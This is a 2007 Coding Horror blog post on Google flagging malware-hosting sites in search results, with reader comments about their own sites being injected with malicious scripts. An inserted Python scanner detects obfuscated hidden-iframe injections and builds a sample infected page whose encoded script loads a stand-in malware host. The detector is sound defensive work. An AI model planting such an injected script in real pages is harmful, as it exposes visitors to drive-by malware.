Coding Horror
programming and human factors
by Jeff Atwood

May 10, 2007

This Site May Harm Your Computer

The Ghost In The Browser: Analysis of Web-based Malware (pdf) describes how Google is leveraging their overwhelming search dominance to combat browser malware installations. In a blog entry last summer, Matt Cutts said:

Given how much I hate web pages that install malicious software or abuse browser security holes, I’d like it if we did even more to protect our users.

Apparently, they've done even more to protect users since then. Here's a Google search result tagged with the ominous warning "This site may harm your computer":

Search results page with an entry tagged 'this site may harm your computer'

Clicking "This site may harm your computer" leads to a Google support page. Attempting to click through to the actual website results in an interstitial warning, offering no way to click through:

Warning - visiting this site may harm your computer!

I think this is a fairly effective method of warning away most rational users from a clearly evil website. Of course, users who desire whatever media, software, or pornography the site is hawking can still type the URL in their address bar. Users will find a way to see the dancing bunnies if they really, really want to, no matter how many warnings and barriers you blast in front of them.

If you want to see what's behind that URL, fair warning: in addition to being outright dangerous for a machine that's not patched to the gills, it's NSFW in a big way. A little investigation showed that it's doing the following:

  • Attempts to use the remote data services ActiveX control.
  • Shows a spoof HTML page with the text "windows media player cannot play video file; Click here to download missing Video ActiveX object". The download runs setup.exe.
  • Runs JavaScript with exploit sniffing code.

If you accept that Google wields the immense power of being the de-facto start page for the internet, then maybe this kind of policing effort comes with the territory. To do nothing-- to let these purely evil sites show up in Google results with no warning whatsoever-- would be irresponsible. Although a person might be performing questionable searches to get this page in their results, it's irrelevant. Despite the individual ethics of the person using that one computer, a compromised computer will be used for attacks and spam against everyone.

Still, I'm a little curious. Why does Google deploy the ultimate weapon of search delisting on sites using black-hat SEO techniques to game search rankings, while known evil malware sites get stern warning interstitials instead? I brought up the Google result by doing a direct search on the domain name. The very same search produces no results on live.com or ask.com. Clearly that site has been delisted by everyone except Google. The domain still has a PageRank of four. I applaud the effort, but what value does keeping a site like that in your search index have for users?

Even if your web site is not evil, it's possible for others to inject malicious code into your page if you're not careful. The Google whitepaper provides three external vectors that can turn a good web page to the dark side:

  • Compromised webservers can insert malicious code into all HTML pages served
  • Pages which allow user-contributed HTML, where the HTML hasn't been properly sanitized
  • The use of questionable advertising content, or compromised ad servers

It's scary how many ways this can happen. I strongly urge you to read the whitepaper to get all the gory details.

Google's paper says one in ten webpages contains malicious code. The most direct way to address malware delivered via web pages is to increase the security of the operating system and the browser, so "drive-by downloads" cannot happen without the user's explicit consent. But a problem as large as malware should be attacked on multiple fronts. Search engines are in a unique position to help index and identify malicious webpages, and prevent them from being accessible in search results. It's encouraging to read about Google's architecture for automatically identifying malicious URLs. I don't think it's fair to call this Google policing the web; it's just good, ethical business to filter out the evil.

Posted by Jeff Atwood

Comments

Won't this affect their claim to be common carriers? Did they even make that claim, or am I imagining things?

Josh on May 13, 2007 10:44 PM

"Why does Google deploy the ultimate weapon of search delisting on sites using black-hat SEO techniques to game search rankings, while known evil malware sites get stern warning interstitials instead?"

Sites are delisted because they try to work around advertising system and get some money FROM Google. Evil sites still attract users, so they can be presented with ads that bring money TO Google. Just a business.

Iggi on May 13, 2007 11:36 PM

A certain country has tried to be the world's policeman. Gets lots of complaints. Is accused of being a bigger threat than the evil it tries to remove. I predict the same fate for Google.

mpbk on May 13, 2007 11:36 PM

I saw this feature a few months ago. Given that they still have the feature enabled, I guess people haven't complained much. I mean, it's there to protect users (like the IE phishing filter) and you can, after all, still visit the site if you want to.

Andrew on May 14, 2007 12:11 AM

Imagine a friend telling you to visit a site that you think sounds evil, how would you research your suspicion if google doesn't keep them listed?

Kris on May 14, 2007 12:23 AM

Still, I am a little skeptical, when *anything* is proclaimed to be better, stronger, more useful and - *FREE*. Why anybody cares for my convenience and safety? Just a pure philanthropy?

But - and it is not only about the SW technologies - can anybody imagine the warning "This site may harm your mind/brain"?

Maximus on May 14, 2007 12:42 AM

> I saw this feature a few months ago

This is the first time I had seen it. I had to search for a site referenced in the article (and boy, there are some big-E Evil sites referenced in that article) to trigger the warning.

I'm thinking that's a *good* thing. :)

Jeff Atwood on May 14, 2007 12:47 AM

"Why does Google deploy the ultimate weapon of search delisting on sites using black-hat SEO techniques to game search rankings, while known evil malware sites get stern warning interstitials instead?"

There's a difference (alluded to above). One is commercial and the other moral. Most people will accept the defence 'I do this to protect my business' whereas 'I do this because it's good for you' is less acceptable due to its subjective nature.

nickd on May 14, 2007 01:35 AM

I am very, very happy that google does this from a website admin point of view.

A few weeks ago I logged in to my site via a hotel (5 star I might add) to check mail and traffic etc. No problem, logged out and enjoyed my holiday.

A couple of weeks later I get several emails from Google saying that my site is hosting malware, huh? They gotta be kidding!? But sure enough I went to the page they mention and my virus checker and IE started going mental showing warnings left, right and center.

I nearly died! I quickly checked the page html and a single line of javascript was inserted, I checked the update time and it was on the same day as I logged into that PC at the hotel. I then found that they had updated one other page. Someone had added some spyware to the hotel's pc which somehow detected that I had logged into a website and then FTPed updates to a couple of pages (this was in my ftp log). I didn't even use an FTP connection, just a webpage admin tool.

Google then had my site listed with the above warning, which of course meant my traffic went into free-fall. I then followed the procedure to clear my site.

So I went into lock-down mode and changed all my passwords to practically everything. My partner also changed all the passwords on everything she visited as well.

So yes, I lost quite a bit of traffic for about a month or so but I prefer that than having my visitors get infected via simply visiting my site.

So two things, never EVER trust any PC other than your own, and Google, for me, is still a friendly giant.

Kevin on May 14, 2007 02:47 AM

If you ask me, if Google did NOT show these evil sites then people would just think the Internet is one big, safe place. It is not. By doing so, Google makes everyone aware of the fact that there are certain dangers on the Internet. Others are just hiding these facts just to give people a more happy feeling.
I am aware of those risks. And considering how dangerous the Internet can be, I hope others are just as aware of the risks as me. Or maybe even more aware. Google has my support. The other search engines are just masking reality.

Lisa on May 14, 2007 04:46 AM

"A certain country has tried to be the world's policeman. Gets lots of complaints. Is accused of being a bigger threat than the evil it tries to remove. I predict the same fate for Google."

Based on what??
I couldn't even begin to list everything wrong with what you just said. Honestly, I want some of whatever you're on, just not as much as you're taking.

Eam on May 14, 2007 05:18 AM

A little naive Jeff. "Drive by downloads" happen the moment you fire up IE, and have been for years. FF is a little better.

No one should be allowed to put 1 thing on my PC without my express consent (cookie, GIF, etc.), now look who's being naive.

I guess it's the *type* of garbage, not if there is garbage, that a site writes to my hard-drive...

Steve on May 14, 2007 06:32 AM

"what value does keeping a site like that in your search index have for users?"

You answer your own question in the next sentence. Many of the sites are legitimate but may have held off on applying a certain patch to their web server just a little too long. It's a tough call- how do you distinguish a site that is merely unlucky or only a little bit negligent from one that is intentionally malicious? Where do you draw the line? Obviously removing the latter type of site from the search index is the best policy, but what about the former?

On one hand, by keeping non-purposefully malicious sites listed users may still be able to view Google's cached and sanitized version as well as the other normal information included in the listing. This way they may perhaps still provide some utility for google's users and the site's owners.

On the other hand, what about possibly permanent damage to a site's reputation resulting from being labeled as "potentially harmful"? Is there a scenario where that could constitute libel or slander? And that's aside from the people who may go on to the site anyway and then become infected.

Joel Coehoorn on May 14, 2007 06:47 AM

What would happen if google warned people using it
that *their* IP had been used to send out spam.

Seems simple to implement as it's easy to receive
spam and check the source IP.

Would this get more people to fix their home
computers security?

fred on May 14, 2007 07:26 AM

I use McAfee's free SiteAdvisor, but you can't be too careful, so I think it's great that Google is getting involved. I am curious why Microsoft is so far behind providing help to its customers. Once again, Microsoft missed the boat.

fxp on May 14, 2007 08:37 AM

"what value does keeping a site like that in your search index have for users?"

So Google can market the fact that they are protecting users. Your coverage is exactly what their marketers are seeking. It's like those movie trailers: Jeff Atwood says Google does "even more to protect users". By playing it quiet, live.com and ask.com get no good will for the same feature.

David Gustafson on May 14, 2007 08:39 AM

To my point, see the post by fxp:

"I am curious why Microsoft is so far behind providing help to its customers."

Google is marketing better.

David Gustafson on May 14, 2007 08:41 AM

Kevin,

Don't blame the hotel. If you typed your passwords on a wireless connection in plaintext (ie, non-SSL connection) they could have easily been sniffed off the air.

Mark on May 14, 2007 08:48 AM

As to why Google would do this out of the goodness of their hearts, remember that more people using the internet more often is good for them. If my mom downloads one more computer-destroying piece of malware she might just swear off the internet forever, and then Google has lost her search dollars. Keeping the internet safe is in their general interest.

Jason on May 14, 2007 09:27 AM

"what value does keeping a site like that in your search index have for users?"

If the user starts off in Google and does a search for the site, and gets a result back that tells them not to go to the site, the user may avoid the site. But if Google simply does not return any results, the user may try another avenue of getting to the site, thinking that Google is missing that site in its lists. The user then arrives at the site and gets infected.

I'd much rather the site come back in the results and then have Google tell me not to go there. Otherwise, I will find another way to get there and I'll never be warned.

Jeff Handley on May 14, 2007 09:35 AM

So if I go to a site, click through several pages and then come across a link and click on it, does google warn me it's malicious? Nope, because google's my search engine and not my browser. So to me, it's a CYA tactic on Google's part. If they have a site listed or advertised that infects someone's pc in this litigious society, someone will eventually sue Google. But where it really needs to be is the responsibility of the browser. It's downloading the page and is capable of doing the same payload evaluation. The only problem is that the browsers that have holes in them the size of the Grand Canyon are the reason why Google is warning people of malicious sites. Perhaps they should warn people they are using flawed browsers while they are at it.

Tim on May 14, 2007 10:54 AM

But... who's watching the watchers?

http://bbaadd.com/blog/2007/01/whos-watching-watchers-stopbadware_11.html

Sorry, Jeff, it sounds like you're about four months behind the news cycle on this one, and on the wrong side of the issue. I don't care what Google thinks of Website X; I just want a search engine that will let me go to Website X if that's what I want to do. Computers (and Web utilities) should make our lives easier, not harder!

Anonymous Cowherd on May 14, 2007 11:55 AM

"StopBadware.org: Incompetence, or McCarthyism 2.0?"
http://www.adwarereport.com/mt/archives/stopbadwareorg.php

Anonymous Cowherd on May 14, 2007 12:23 PM

fred: No, they'd just assume Google was wrong, since "I didn't send any spam!".

Sigivald on May 14, 2007 01:24 PM

Google have been doing this for a while now. It's a bad idea that will inevitably lead to lawsuits. They will not be able to catch all bad sites, and by implication any site they don't flag is ok. They could flag sites with nothing wrong, which could be potentially devastating to a website's reputation.

Google is a search engine, it is not their role to pass judgement on the sites returned in search results. Far from making the internet safer, they are actually increasing the risk to themselves and others. They really haven't thought this through at all.

Gerald on May 14, 2007 01:56 PM

> http://bbaadd.com/blog/2007/01/whos-watching-watchers-stopbadware_11.html

What a coincidence, I was literally just at that Life in Hell fansite last week via a Google search. It must have been cleared since January, because I certainly didn't see the malware warning in my Google results. I just searched for it again, and it's clean.

Point taken about notifying people whose websites are compromised or otherwise accidentally hosting malware. Removal from the search index is more subtle (and more painful) than a prominent, hard-to-miss warning with links back to the Google support page for the malware topic.

> Perhaps they should warn people they are using flawed browsers while they are at it.

Like I said, I think the malware problem is so big that you have to attack it on multiple fronts. I agree that users should be nagged about using a modern browser.

Jeff Atwood on May 14, 2007 01:58 PM

How about site advisor which is now part of McAfee.

AjiNIMC - Gmail a part of my personal nerve center on May 14, 2007 08:16 PM

I agree with mpbk. Nobody likes it when an authority (person/company/thing/group etc) starts taking decisions out of your hands instead of warning, guiding and educating you. I definitely want to know when a site or link is likely to be harmful but if I really want to click that link, then that should be my right. And if I get a rig full of crap-ware then that’s my problem. Users, at some point, need to take responsibility for their actions. Making the internet (and Google) uber-safe for the lowest common denominator only serves to bring the whole thing down, not move it forward.

David Hodges on May 14, 2007 10:37 PM

Mark,

It happened from their internet cafe (guests only) from what I understood to be a wired in network. My feeling is that the PCs were infected with spyware. It would make sense for someone to install stuff like that on PCs in such an exclusive hotel, anyone logging into anything there is more likely to be connecting to some fairly interesting stuff.

Kevin on May 15, 2007 12:57 AM

"I applaud the effort, but what value does keeping a site like that in your search index have for users?"

A common user will see that Google blocked the page. He will not see that the other engines delisted it. What does the better marketing for you?

Right, if you do something good for the user: Let him know. It doesn't help him, but it does help your image.

Hinek on May 15, 2007 01:28 AM

google, if they are serious about this, may need to visit a page more than once, firstly as usual (aka googlebot) and secondly a simple script that identifies itself as IE, to see if the result is different. they may already do this but i can see 'bad' sites being modified so google sees no evil to game this one.

it's a good idea, but a browser warning isn't, people will ignore it.

I'd like to see the "this site may harm your computer" link being a bit more obvious, maybe having the link in a different colour, also the advanced search being able to filter out such sites (off by default)

claire rand on May 15, 2007 09:36 AM

"To do nothing-- to let these purely evil sites show up in Google results with no warning whatsoever-- would be irresponsible."

I disagree, Google is a search engine - not the internet police. It's great that Google is offering such features as value-add to the users. But if they don't do it, it's not irresponsible or negligence.

The line must be drawn as to what is a great offering, and what a provider must provide (ie your expectations). And in this case Google does not need to provide anything. You should be happy with what you get - it's free.

Ivan G on May 15, 2007 04:51 PM

I am not so sure they do it correctly.
The best way would be to have a tool in their
webmaster control panel to say the issue has been fixed.
They also should show which webpages and why they are infected.
Just like any other anti-virus program does.

I have several sites who got the uniqu-soft.com javascript
at the end of the index.php and now basically all my sites are not accessible although I removed the script.
That's pretty lame from google. It should be quick and automatic. but waiting and waiting for my indexed pages to be recognized again as clean is just stupid and old technology

Daniel Travolto on May 25, 2007 10:57 PM

hi

My Site www.etatvasoft.com is displayed on google page in
THIS SITE MAY HARM YOUR COMPUTER. So what i do remove the HARM.
and also i Google or and one site me inform any time me alert form
your site HARM. So can also remove the HARM..


Rakesh
eTatvasoft

Rakesh on July 9, 2007 05:57 AM

hi,
My site http://www.scarves-stoles-pareos.com is displayed on google page in This site may harm your computer. so what i do that my website and computer has cleaned. pl. give me some idea.

chandan
Email :- chandan@syscommsolutions.com
:- chunnu.chandan@gmail.com

chandan on August 7, 2007 06:12 AM

Hi ,
Our site http://www.relaxindochina.com get the same trouble with some code of script at our bottom sites, when we found it and removed, even we use the Stopbadware Form to receive what we did to make our site safer, but Google still flag us

Tony on August 13, 2007 12:51 AM

Google's Matt Cutts has an update which describes the "This Site May Harm Your Computer" initiative in more detail. It also provides instructions on how to fix your site if you've been flagged by Google:

http://www.mattcutts.com/blog/closing-the-loop-on-malware/

Jeff Atwood on August 15, 2007 05:24 PM

Why should any website harm anyone's computer stupid people.!

Eduardo Guerrero on August 17, 2007 08:34 AM

Nice that you're all sharing the thoughts you have on badware/malware and that many of you feel this is necessary.

Websites can harm your computer if you're not technically inclined to fix everything yourself. It's a fact that most users of computers are users, and not administrators or don't have the knowledge to see the problems. As a matter of fact, many of the webmasters having his site marked as possibly dangerous doesn't even know what is going on.

Google is making people aware, and by joining with Stopbadware.org they are trying to give a place where you can seek some community help and possibly get the issues fixed quickly. I can only encourage webmaster experiencing this problem to visit the Stopbadware site and google group to get to know more about the subject.

As for hotels, Internet cafe's and public computers in general not to be blamed for badware or any kinds of abuse, I think they should be blamed fully. The respective owners of the computers, even though they are publicly shared, should make sure that this cannot happen, they owe that to their visitors. I've had an internet cafe for 10+ years, and it's never happened to me or any of my customers, so it's absolutely possible with a little work.

Cometcom1 on August 24, 2007 09:08 AM

Here's where Google is bad: To have your innocent site unflagged, Google's form will not work unless you first admit that you believe your site has done bad things...even when it hasn't. In my opinion, this is an abuse of power.

Bill on September 13, 2007 12:11 PM

my site virtualdarpan also is recently flagged with warning message. when i check my site code then i found some hackers insert unescape(%jhasgd%hg%) something like that a big javascript code. which when unescaped gives few iframes with link to hackers site which downloads viruses and keyloggers etc.

but still i am wondering how spammers insert such code at the end of each file in my server. ?!?

damu on October 9, 2007 05:57 PM
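A defender-side check for the injection pattern several commenters describe (a script line added at the end of a page that `unescape()`s into hidden iframes), as an added example that is not part of the original post or its comments. The sample pages, the `.example` hosts and the `scan_page` helper are constructed for illustration, and only literal-string `unescape()` calls are handled.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# unescape("...") called on a literal string; other obfuscation is not handled.
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
JS_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def js_unescape(text):
    """Decode %XX and %uXXXX sequences the way JavaScript's unescape() does."""
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


class IframeCollector(HTMLParser):
    """Records the attributes of every <iframe> start tag it sees."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({name: value or "" for name, value in attrs})


def is_hidden(attrs):
    """True for zero/one-pixel frames or frames hidden through inline CSS."""
    tiny = {"0", "1"}
    return (attrs.get("width", "").strip() in tiny
            or attrs.get("height", "").strip() in tiny
            or bool(HIDDEN_STYLE.search(attrs.get("style", ""))))


def decoded_layers(html, max_depth=3):
    """Yield (depth, text): the page itself, then each decoded unescape() payload."""
    queue = [(0, html)]
    while queue:
        depth, text = queue.pop(0)
        yield depth, text
        if depth < max_depth:
            for match in UNESCAPE_CALL.finditer(text):
                queue.append((depth + 1, js_unescape(match.group(2))))


def scan_page(html, own_host):
    """Return (finding, host, depth) tuples for one page of the site own_host."""
    findings = []
    for depth, text in decoded_layers(html):
        collector = IframeCollector()
        collector.feed(text)
        collector.close()
        for attrs in collector.iframes:
            host = urlparse(attrs.get("src", "")).hostname or ""
            if not host or host == own_host:
                continue  # relative or same-site frame
            if is_hidden(attrs):
                findings.append(("hidden-external-iframe", host, depth))
            elif depth > 0:
                findings.append(("obfuscated-external-iframe", host, depth))
    # Markup after the closing </html> tag matches the "added at the end of
    # the file" pattern the comments describe.
    tail = re.split(r"</html\s*>", html, flags=re.I)[-1]
    if re.search(r"</html\s*>", html, re.I) and re.search(r"<(script|iframe)\b", tail, re.I):
        findings.append(("markup-after-html-close", "", 0))
    return findings


# Constructed sample pages; every host uses the reserved .example TLD.
PAYLOAD = '<iframe src="http://malware-host.example/in.php" width="0" height="0"></iframe>'
ENCODED = "".join("%%%02X" % ord(ch) for ch in PAYLOAD)
CLEAN = ('<html><body><h1>My site</h1><iframe src="http://www.mysite.example/map"'
         ' width="400" height="300"></iframe></body></html>')
INFECTED = CLEAN + '\n<script>document.write(unescape("' + ENCODED + '"));</script>'

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, scan_page(page, "www.mysite.example"))
```

Run over the files on the server rather than the rendered site, a check like this shows which pages were modified and which host the injected frame points to.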

My Site www.allhoteldeals.net is displayed on google page in
THIS SITE MAY HARM YOUR COMPUTER. So what should i do to remove the HARM. explain me briefly

thanks & regards
ravi
ravi_seo@yahoo.co.in

Ravi Kumar on February 6, 2008 08:10 AM

Even my site "Free ebooks collection" was getting this message. After reading on internet I came to know that this message was there because of one advertiser network whose script I was using in my site. After removing that script from my site and requesting for review , the message got removed.

Shahid(Free ebooks collection) siddique on February 8, 2008 08:42 AM

Let me tell you guys what happened to me yesterday.

I run a celebrity blog and went searching for info on a female singer. I followed a link via Google to her website and I got the above warning. I had seen that warning on previous sites and stayed away. However, when I saw it for this site, which I had just visited about 2 weeks earlier I ignored it and clicked the link.

The site was moving slowly and after about a minute or so my computer shut down and restarted. When I got back to desktop I had an error saying my comp was infected and there was a NEW anti virus software on my computer that shut down my McAfee virus software.

To save my life I cannot remember the name of this software but I did a search on how to remove it and nothing worked as it installs an icon in your tray that keeps re-installing it, even after you un-install it. As a last resort I had to do a system restore which solved the problem- hopefully.

So my advice is heed that WARNING when you see it- I should have.

JBL on February 13, 2008 04:14 PM

Why would google want to state that my site is harmful for Hawaiian Blog? WHY? No script is installed except their adsense javascript that's it! ...today i noticed google flagged my site with "this site may harm your computer" WTF?????????

if you go to http://www.hawaiib.com you will clearly see there is nothing harmful except few pictures from hawaii and posts..

but if you go to google.com type let say hawaiian blog you will get prompted and asked if you really want to access it?

I hate this i swear.

LiveCrunch on February 27, 2008 12:35 PM

The instructions on how to fix this are at Matt Cutts blog, which I linked in an earlier comment.

http://www.mattcutts.com/blog/closing-the-loop-on-malware/

Use the Google webmaster tools!

http://www.google.com/webmasters/

Some features of the Google webmaster tools:
--
* New: Request a malware review from Google and we’ll evaluate your site.
* New: Check the status of your review.
* If we feel the site is still harmful, we’ll provide an updated list of remaining dangerous URLs
* If we’ve determined the site to be clean, you can expect removal of malware messages in the near future (usually within 24 hours).
--

Jeff Atwood on February 27, 2008 01:28 PM

Great mate !! This article might be helpful as this is simple and short !! http://ankitrawat.com/blog/remove-google-search-warning-message/

Ankit on March 13, 2008 12:37 AM











Content (c) 2008 Jeff Atwood. Logo image used with permission of the author. (c) 1993 Steven C. McConnell. All Rights Reserved.